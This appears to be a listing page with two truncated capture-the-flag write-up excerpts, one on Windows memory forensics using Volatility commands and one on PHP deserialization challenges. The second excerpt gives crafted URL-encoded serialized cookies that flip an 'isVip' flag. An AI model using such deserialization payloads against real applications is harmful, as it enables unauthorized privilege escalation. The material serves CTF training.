[ctf misc][wp] wp of some memory Forensics (including the Bo People's files of [2021 Blue Hat Cup North Division]
wp
1. [v & n2020 open] memory Forensics
1. Find strategies
volatility.exe -f C:\Users\shen\Downloads\mem.raw imageinfo
2. Look at the process
volatility.exe -f C:\Users\shen\Downloads\mem.raw --profile=Win7SP1x86_23418 pslist > pslist.txt
From the back to the front, the last one is for fixing the memory image dumpit Software and ...
Posted by Duell on Mon, 17 Jan 2022 00:52:46 +0100
ctfshow_ On deserialization
web254
?username=xxxxxx&password=xxxxxx
web255
cookie:
user=O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
web256
cookie:
O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%22a%22%3Bs%3A8%3A%22password%22 ...
Posted by squimmy on Sat, 30 Oct 2021 17:44:41 +0200